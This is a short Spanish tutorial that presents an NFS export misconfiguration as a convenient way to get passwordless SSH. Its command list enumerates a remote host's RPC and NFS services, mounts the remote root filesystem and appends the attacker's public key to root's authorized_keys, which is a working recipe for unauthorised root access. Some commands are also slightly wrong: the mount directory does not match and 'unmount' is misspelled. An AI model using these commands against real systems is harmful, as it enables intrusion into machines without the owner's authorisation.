Vulnerabilidad - conexión remota ssh

VULNERABILIDAD - CONEXIÓN REMOTA SSH SIN HACER LOGUIN:
 
A priori podemos verlo como una vulnerabilidad en ubuntu server y en realidad lo es, pero en este caso lo vamos a interpretar como una forma bastante útil de realizar conexiones SSH sin necesidad de realizar el loguin, es decir de introducir usuario y contraseña. Esto es muy util a la hora de hacer script que automaticen tareas por ejemplo.

Aunque parezca evidente este ejercicio deja rastro por lo que no es conveniente  reproducirlo en una máquina ajena.

Para llevar a cabo esta acción necesitamos los siguientes puertos abiertos y en ningun momento necesitamos conocer ni la contraseña ni acceder a la máquina remota, de ahi que sea una vulnerabilidad.

Para comprobar que estos puertos estan abierto se puede utilizar la aplicación archiconocida NMAP, por lo que en este artículo no nos vamos a detener en el uso de esta aplicación sino que suponemos que efectivamente los siguientes puertos estan abiertos:

                     - Protocolo ssh: 22 ssh
                     - Protocolo rpcinfo 111 rpcbin
                     - Protocolo nfs 2049 nfs

Protocolo rpcinfo según la Wikipedia: RPC (Remote Procedure Call) es un protocolo que permite a un programa de ordenador ejecutar código en otra máquina remota sin tener que preocuparse por las comunicaciones entre ambos

Protocolo nfs según la Wikipedia:NFS (Network File System) es un protocolo de nivel de aplicación […] utilizado para sistemas de archivos distribuidos en un entorno de red”, lo cual permite que diferentes ordenadores compartan carpetas de red.

Comandos:

                     rpcinfo -p IP_REMOTA

                     showmount -e IP_REMOTA

                     ssh-keygen

                     mkdir /temp/test

                     mount -t nfs IP_REMOTA:/ /temp/test/ -o nolock

                     cat ~/.ssh/id_rsa.pub >> /tmp/test/root/.ssh/authorized_keys

                     unmount /tmp/test